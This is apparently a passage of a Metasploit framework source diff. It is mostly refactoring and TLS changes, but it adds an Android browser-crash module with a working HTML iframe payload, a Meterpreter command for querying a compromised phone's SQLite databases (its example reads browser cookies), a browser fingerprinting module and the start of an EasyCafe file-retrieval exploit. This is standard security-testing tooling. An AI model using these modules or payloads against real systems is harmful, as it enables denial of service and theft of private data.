# make sense to complain to the user that we didn't get a session
|
||||
disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false
|
||||
unless disable_handler
|
||||
unless mod.datastore["DisablePayloadHandler"]
|
||||
fail_msg = 'Exploit completed, but no session was created.'
|
||||
print_status(fail_msg)
|
||||
begin
|
||||
|
|
|
@ -139,13 +139,13 @@ class Driver < Msf::Ui::Driver
|
|||
self.disable_output = false
|
||||
|
||||
# Whether or not command passthru should be allowed
|
||||
self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true
|
||||
self.command_passthru = opts.fetch('AllowCommandPassthru', true)
|
||||
|
||||
# Whether or not to confirm before exiting
|
||||
self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false
|
||||
self.confirm_exit = opts['ConfirmExit']
|
||||
|
||||
# Disables "dangerous" functionality of the console
|
||||
@defanged = opts['Defanged'] == true
|
||||
@defanged = opts['Defanged']
|
||||
|
||||
# If we're defanged, then command passthru should be disabled
|
||||
if @defanged
|
||||
|
@ -659,7 +659,7 @@ protected
|
|||
def unknown_command(method, line)
|
||||
|
||||
[method, method+".exe"].each do |cmd|
|
||||
if (command_passthru == true and Rex::FileUtils.find_full_path(cmd))
|
||||
if command_passthru && Rex::FileUtils.find_full_path(cmd)
|
||||
|
||||
print_status("exec: #{line}")
|
||||
print_line('')
|
||||
|
|
|
@ -21,7 +21,3 @@ end
|
|||
|
||||
# Executable generation and encoding
|
||||
require 'msf/util/exe'
|
||||
|
||||
# Parse SVN entries
|
||||
require 'msf/util/svn'
|
||||
|
||||
|
|
|
@ -1,120 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
###
|
||||
#
|
||||
# framework-util-svn
|
||||
# --------------
|
||||
#
|
||||
# The class provides methods for parsing the SVN information in the framework directory
|
||||
#
|
||||
###
|
||||
|
||||
require 'date'
|
||||
|
||||
module Msf
|
||||
module Util
|
||||
class SVN
|
||||
|
||||
def self.load_root
|
||||
info = {}
|
||||
path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries")
|
||||
if !::File.exists?(path)
|
||||
return info
|
||||
end
|
||||
contents = ''
|
||||
File.open(path, "rb") do |fd|
|
||||
contents = fd.read(::File.size(path))
|
||||
end
|
||||
if contents.include? "<?xml"
|
||||
require 'rexml/document'
|
||||
rd = REXML::Document.new(contents).root
|
||||
rd.elements.each { |e|
|
||||
if e.attributes['name'] == ""
|
||||
info[:root] = e.attributes['url']
|
||||
info[:revision] = e.attributes['revision']
|
||||
info[:updated] = e.attributes['committed-date']
|
||||
break
|
||||
end
|
||||
}
|
||||
else
|
||||
ents = contents.split("\x0c")
|
||||
ents[0].split("\n").each do |line|
|
||||
line.strip!
|
||||
next if line.empty?
|
||||
case line
|
||||
when /framework3/
|
||||
info[:root] = line
|
||||
when /^\d+$/
|
||||
info[:revision] = line.to_i
|
||||
when /^\d{4}-\d.*T/
|
||||
info[:updated] = line
|
||||
end
|
||||
break if (info[:root] and info[:revision] and info[:updated])
|
||||
end
|
||||
end
|
||||
info
|
||||
end
|
||||
|
||||
def self.revision
|
||||
@@info ||= load_root
|
||||
@@info[:revision]
|
||||
end
|
||||
|
||||
def self.updated
|
||||
@@info ||= load_root
|
||||
@@info[:updated]
|
||||
end
|
||||
|
||||
def self.root
|
||||
@@info ||= load_root
|
||||
@@info[:root]
|
||||
end
|
||||
|
||||
def self.days_since_update
|
||||
@@info ||= load_root
|
||||
svnt = @@info[:updated]
|
||||
if(not svnt)
|
||||
return
|
||||
end
|
||||
|
||||
# Date.parse and Date.strptime are both broken beyond repair in
|
||||
# ruby 1.8.6 and older. Just bail if the parsing doesn't work.
|
||||
begin
|
||||
diff = (Date.parse(Time.now.to_s) - Date.parse(svnt)).to_f
|
||||
rescue ArgumentError
|
||||
end
|
||||
end
|
||||
|
||||
def self.last_updated_friendly
|
||||
diff = self.days_since_update
|
||||
case diff
|
||||
when nil
|
||||
"at an unknown date"
|
||||
when -2.0 .. 1.0
|
||||
"today"
|
||||
when 1.0 .. 2.0
|
||||
"yesterday"
|
||||
else
|
||||
if (diff.to_i > 7)
|
||||
"%red#{diff.to_i} days ago%clr"
|
||||
else
|
||||
"#{diff.to_i} days ago"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def self.last_updated_date
|
||||
@@info ||= load_root
|
||||
svnt = @@info[:updated]
|
||||
if(not svnt)
|
||||
return
|
||||
end
|
||||
begin
|
||||
Date.parse(@@info[:updated])
|
||||
rescue ArgumentError
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -295,6 +295,33 @@ class Android < Extension
|
|||
end
|
||||
networks
|
||||
end
|
||||
|
||||
def sqlite_query(dbname, query, writeable)
|
||||
request = Packet.create_request('sqlite_query')
|
||||
request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname)
|
||||
request.add_tlv(TLV_TYPE_SQLITE_QUERY, query)
|
||||
request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable)
|
||||
response = client.send_request(request, 30)
|
||||
error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR)
|
||||
raise "SQLiteException: #{error_msg.value}" if error_msg
|
||||
|
||||
unless writeable
|
||||
result = {
|
||||
columns: [],
|
||||
rows: []
|
||||
}
|
||||
data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP)
|
||||
unless data.nil?
|
||||
columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS)
|
||||
result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
|
||||
data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row|
|
||||
result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -81,6 +81,15 @@ TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS
|
|||
TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102)
|
||||
TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103)
|
||||
|
||||
TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080)
|
||||
TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081)
|
||||
TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082)
|
||||
TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083)
|
||||
TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084)
|
||||
TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085)
|
||||
TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086)
|
||||
TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087)
|
||||
|
||||
TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201)
|
||||
|
||||
end
|
||||
|
|
|
@ -31,6 +31,7 @@ class Console::CommandDispatcher::Android
|
|||
'wlan_geolocate' => 'Get current lat-long using WLAN information',
|
||||
'interval_collect' => 'Manage interval collection capabilities',
|
||||
'activity_start' => 'Start an Android activity from a Uri string',
|
||||
'sqlite_query' => 'Query a SQLite database from storage',
|
||||
'set_audio_mode' => 'Set Ringer Mode'
|
||||
}
|
||||
|
||||
|
@ -45,6 +46,7 @@ class Console::CommandDispatcher::Android
|
|||
'wlan_geolocate' => ['wlan_geolocate'],
|
||||
'interval_collect' => ['interval_collect'],
|
||||
'activity_start' => ['activity_start'],
|
||||
'sqlite_query' => ['sqlite_query'],
|
||||
'set_audio_mode' => ['set_audio_mode']
|
||||
}
|
||||
|
||||
|
@ -189,7 +191,7 @@ class Console::CommandDispatcher::Android
|
|||
path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
|
||||
dump_sms_opts = Rex::Parser::Arguments.new(
|
||||
'-h' => [ false, 'Help Banner' ],
|
||||
'-o' => [ false, 'Output path for sms list']
|
||||
'-o' => [ true, 'Output path for sms list']
|
||||
)
|
||||
|
||||
dump_sms_opts.parse(args) do |opt, _idx, val|
|
||||
|
@ -277,7 +279,7 @@ class Console::CommandDispatcher::Android
|
|||
|
||||
dump_contacts_opts = Rex::Parser::Arguments.new(
|
||||
'-h' => [ false, 'Help Banner' ],
|
||||
'-o' => [ false, 'Output path for contacts list']
|
||||
'-o' => [ true, 'Output path for contacts list']
|
||||
)
|
||||
|
||||
dump_contacts_opts.parse(args) do |opt, _idx, val|
|
||||
|
@ -381,7 +383,7 @@ class Console::CommandDispatcher::Android
|
|||
dump_calllog_opts = Rex::Parser::Arguments.new(
|
||||
|
||||
'-h' => [ false, 'Help Banner' ],
|
||||
'-o' => [ false, 'Output path for call log']
|
||||
'-o' => [ true, 'Output path for call log']
|
||||
|
||||
)
|
||||
|
||||
|
@ -578,6 +580,55 @@ class Console::CommandDispatcher::Android
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_sqlite_query(*args)
|
||||
sqlite_query_opts = Rex::Parser::Arguments.new(
|
||||
'-h' => [ false, 'Help Banner' ],
|
||||
'-d' => [ true, 'The sqlite database file'],
|
||||
'-q' => [ true, 'The sqlite statement to execute'],
|
||||
'-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)']
|
||||
)
|
||||
|
||||
writeable = false
|
||||
database = ''
|
||||
query = ''
|
||||
sqlite_query_opts.parse(args) do |opt, _idx, val|
|
||||
case opt
|
||||
when '-h'
|
||||
print_line("Usage: sqlite_query -d <database_file> -q <statement>\n")
|
||||
print_line(sqlite_query_opts.usage)
|
||||
return
|
||||
when '-d'
|
||||
database = val
|
||||
when '-q'
|
||||
query = val
|
||||
when '-w'
|
||||
writeable = true
|
||||
end
|
||||
end
|
||||
|
||||
if database.blank? || query.blank?
|
||||
print_error("You must enter both a database files and a query")
|
||||
print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'")
|
||||
print_line(sqlite_query_opts.usage)
|
||||
return
|
||||
end
|
||||
|
||||
result = client.android.sqlite_query(database, query, writeable)
|
||||
unless writeable
|
||||
header = "#{query} on database file #{database}"
|
||||
table = Rex::Ui::Text::Table.new(
|
||||
'Header' => header,
|
||||
'Columns' => result[:columns],
|
||||
'Indent' => 0
|
||||
)
|
||||
result[:rows].each do |e|
|
||||
table << e
|
||||
end
|
||||
print_line
|
||||
print_line(table.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Name for this dispatcher
|
||||
#
|
||||
|
|
|
@ -65,7 +65,7 @@ begin
|
|||
when 'SSL2', :SSLv2
|
||||
version = :SSLv2
|
||||
# 'TLS' will be the new name for autonegotation with newer versions of OpenSSL
|
||||
when 'SSL23', :SSLv23, 'TLS'
|
||||
when 'SSL23', :SSLv23, 'TLS', 'Auto'
|
||||
version = :SSLv23
|
||||
when 'SSL3', :SSLv3
|
||||
version = :SSLv3
|
||||
|
@ -124,6 +124,11 @@ begin
|
|||
# Tie the context to a socket
|
||||
self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx)
|
||||
|
||||
# If peerhost looks like a hostname, set the undocumented 'hostname'
|
||||
# attribute on sslsock, which enables the Server Name Indication (SNI)
|
||||
# extension
|
||||
self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost)
|
||||
|
||||
# Force a negotiation timeout
|
||||
begin
|
||||
Timeout.timeout(params.timeout) do
|
||||
|
|
|
@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model', '1.1.0'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.1.2'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.1.3'
|
||||
# Needed by msfgui and other rpc components
|
||||
spec.add_runtime_dependency 'msgpack'
|
||||
# get list of network interfaces, like eth* from OS.
|
||||
|
|
|
@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
def run
|
||||
print_status("Running MS SQL Server Enumeration...")
|
||||
|
||||
if mssql_login_datastore == false
|
||||
if !mssql_login_datastore
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
|
|
|
@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']),
|
||||
OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']),
|
||||
OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
|
||||
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
|
||||
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
|
||||
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']),
|
||||
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
|
||||
vscpath = datastore['VSCPATH']
|
||||
else
|
||||
unless datastore['CREATE_NEW_VSC'] == true
|
||||
unless datastore['CREATE_NEW_VSC']
|
||||
vscpath = check_vss(text, bat)
|
||||
end
|
||||
unless vscpath
|
||||
|
|
|
@ -0,0 +1,62 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "Android Stock Browser Iframe DOS",
|
||||
'Description' => %q(
|
||||
This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
|
||||
If successful, the browser will crash after viewing the webpage.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Jean Pascal Pereira', # Original exploit discovery
|
||||
'Jonathan Waggoner' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
[ 'PACKETSTORM', '118539'],
|
||||
[ 'CVE', '2012-6301' ]
|
||||
],
|
||||
'DisclosureDate' => "Dec 1 2012",
|
||||
'Actions' => [[ 'WebServer' ]],
|
||||
'PassiveActions' => [ 'WebServer' ],
|
||||
'DefaultAction' => 'WebServer'
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
exploit # start http server
|
||||
end
|
||||
|
||||
def setup
|
||||
@html = %|
|
||||
<html>
|
||||
<body>
|
||||
<script type="text/javascript">
|
||||
for (var i = 0; i < 600; i++)
|
||||
{
|
||||
var m_frame = document.createElement("iframe");
|
||||
m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");
|
||||
document.body.appendChild(m_frame);
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
end
|
||||
|
||||
def on_request_uri(cli, _request)
|
||||
print_status('Sending response')
|
||||
send_response(cli, @html)
|
||||
end
|
||||
end
|
|
@ -7,6 +7,9 @@ require 'msf/core'
|
|||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe')
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
|
|
|
@ -37,7 +37,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'SSLVersion' => 'TLS1',
|
||||
'RPORT' => 443
|
||||
}
|
||||
))
|
||||
|
|
|
@ -28,6 +28,9 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[ 'MSB', 'MS09-065' ],
|
||||
[ 'OSVDB', '59869']
|
||||
],
|
||||
'Actions' => [[ 'WebServer' ]],
|
||||
'PassiveActions' => [ 'WebServer' ],
|
||||
'DefaultAction' => 'WebServer',
|
||||
'DisclosureDate' => 'Nov 10 2009'
|
||||
))
|
||||
register_options([
|
||||
|
|
|
@ -538,7 +538,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
|
||||
end
|
||||
# fuzz headers ?
|
||||
if datastore['FUZZHEADERS'] == true
|
||||
if datastore['FUZZHEADERS']
|
||||
print_status("Fuzzing header fields")
|
||||
do_fuzz_headers(thisform,response.headers)
|
||||
end
|
||||
|
|
|
@ -9,6 +9,9 @@ require 'net/ssh'
|
|||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution')
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -130,4 +133,4 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
# set.
|
||||
#
|
||||
def use_zlib
|
||||
unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false
|
||||
unless Rex::Text.zlib_present? || !datastore['HTTP::compression']
|
||||
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,85 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "HTTP Client Information Gather",
|
||||
'Description' => %q{
|
||||
This module gathers information about a browser that exploits might be interested in, such
|
||||
as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
|
||||
but you can customize this output by changing the Custom404 datastore option, and
|
||||
redirect to an external web page.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'DisclosureDate' => "Mar 22 2016",
|
||||
'Actions' =>
|
||||
[
|
||||
[
|
||||
'WebServer', {
|
||||
'Description' => 'A web that collects information about the browser.'
|
||||
}]
|
||||
],
|
||||
'PassiveActions' => [ 'WebServer' ],
|
||||
'DefaultAction' => 'WebServer'
|
||||
))
|
||||
end
|
||||
|
||||
def is_key_wanted?(key)
|
||||
![:module, :created_at, :tried, :vuln_test, :address].include?(key)
|
||||
end
|
||||
|
||||
def is_value_wanted?(value)
|
||||
!(value.nil? || value =~ /^undefined|false/ || !value)
|
||||
end
|
||||
|
||||
def ignore_items!(target_info)
|
||||
target_info.delete_if do |key, value|
|
||||
!is_key_wanted?(key) || !is_value_wanted?(value)
|
||||
end
|
||||
end
|
||||
|
||||
def report_host_info(target_info)
|
||||
opts = { host: target_info[:address] }
|
||||
opts.merge!(target_info)
|
||||
report_host(opts)
|
||||
end
|
||||
|
||||
def translate_script_meaning(value)
|
||||
case value
|
||||
when 'script'
|
||||
'Browser allows JavaScript'
|
||||
when 'headers'
|
||||
'Browser does not allow JavaScript'
|
||||
end
|
||||
end
|
||||
|
||||
def print_target_info(cli, target_info)
|
||||
print_status("#{cli.peerhost} - We have found the following interesting information:")
|
||||
report_host_info(target_info)
|
||||
ignore_items!(target_info)
|
||||
target_info.each_pair do |key, value|
|
||||
if key == :source
|
||||
value = translate_script_meaning(value)
|
||||
end
|
||||
print_status("#{cli.peerhost} - #{key} = #{value}")
|
||||
end
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, req, target_info)
|
||||
print_target_info(cli, target_info)
|
||||
send_not_found(cli)
|
||||
end
|
||||
|
||||
def run
|
||||
exploit
|
||||
end
|
||||
|
||||
end
|
|
@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSLVersion' => 'TLS1',
|
||||
'SSL' => true
|
||||
}
|
||||
))
|
||||
|
|
|
@ -286,7 +286,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
# set.
|
||||
#
|
||||
def use_zlib
|
||||
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
|
||||
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
|
||||
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
name = name.to_s.camelize(:lower)
|
||||
uri = api_path + name
|
||||
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1')
|
||||
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS')
|
||||
cli.connect
|
||||
req = cli.request_cgi({
|
||||
'uri' => uri,
|
||||
|
@ -430,16 +430,15 @@ class MetasploitModule < Msf::Auxiliary
|
|||
{
|
||||
'RPORT' => 443,
|
||||
'SSL' => true,
|
||||
'SSLVersion' => 'TLS1'
|
||||
}
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('HOSTNAME', [true, 'The target hostname']),
|
||||
OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]),
|
||||
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']),
|
||||
OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']),
|
||||
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true'])
|
||||
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]),
|
||||
OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]),
|
||||
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'SSLVersion' => 'TLS1'
|
||||
}
|
||||
)
|
||||
|
||||
|
|
|
@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'SSLVersion' => 'TLS1',
|
||||
'RPORT' => 443
|
||||
}
|
||||
))
|
||||
|
|
|
@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 443,
|
||||
'SSLVersion' => 'SSL3'
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
|
@ -43,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']])
|
||||
Opt::SSLVersion
|
||||
]
|
||||
)
|
||||
|
||||
|
|
|
@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
{
|
||||
'RPORT' => 443,
|
||||
'SSL' => true,
|
||||
'SSLVersion' => 'TLS1'
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]),
|
||||
OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]),
|
||||
OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]),
|
||||
OptString.new('TARGETURI', [true, 'The base path', '/'])
|
||||
], self.class)
|
||||
|
@ -35,8 +34,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false
|
||||
print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.")
|
||||
if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES']
|
||||
print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.")
|
||||
else
|
||||
super
|
||||
end
|
||||
|
@ -51,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
# If no response, quit now
|
||||
if res.nil?
|
||||
print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true
|
||||
vprint_error("[#{target_host}:#{rport}] No response")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -65,12 +64,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
server_header = val if key.downcase == 'server'
|
||||
end
|
||||
else
|
||||
print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true
|
||||
vprint_error("[#{target_host}:#{rport}] No HTTP headers")
|
||||
end
|
||||
|
||||
# If the body is blank, just stop now as there is no chance of a title
|
||||
if res.body.nil?
|
||||
print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true
|
||||
vprint_error("[#{target_host}:#{rport}] No webpage body")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -78,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
# there is no chance that we will have a title
|
||||
rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*</title>}im.match(res.body.to_s)
|
||||
unless rx
|
||||
print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true
|
||||
vprint_error("[#{target_host}:#{rport}] No webpage title")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -86,13 +85,15 @@ class MetasploitModule < Msf::Auxiliary
|
|||
rx[:title].strip!
|
||||
if rx[:title] != ''
|
||||
rx_title = Rex::Text.html_decode(rx[:title])
|
||||
print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true
|
||||
if datastore['STORE_NOTES'] == true
|
||||
if datastore['SHOW_TITLES']
|
||||
print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}")
|
||||
end
|
||||
if datastore['STORE_NOTES']
|
||||
notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] }
|
||||
report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data)
|
||||
end
|
||||
else
|
||||
print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true
|
||||
vprint_error("[#{target_host}:#{rport}] No webpage title")
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file)
|
||||
vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
|
||||
|
||||
if datastore['VERBOSE'] == true
|
||||
if datastore['VERBOSE']
|
||||
vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
|
||||
res.body.each_line do |line|
|
||||
# the following is the last line of the useless response
|
||||
|
@ -108,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
out = false
|
||||
end
|
||||
elsif (res and res.code)
|
||||
elsif res && res.code
|
||||
vprint_error("#{rhost}:#{rport} - File->#{file} not found")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,97 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'EasyCafe Server Remote File Access',
|
||||
'Description' => %q{
|
||||
This module exploits a file retrieval vulnerability in
|
||||
EasyCafe Server. The vulnerability can be triggered by
|
||||
sending a specially crafted packet (opcode 0x43) to the
|
||||
831/TCP port.
|
||||
This module has been successfully tested on EasyCafe Server
|
||||
version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
|
||||
and Windows 7 SP1.
|
||||
Note that the server will throw a popup messagebox if the
|
||||
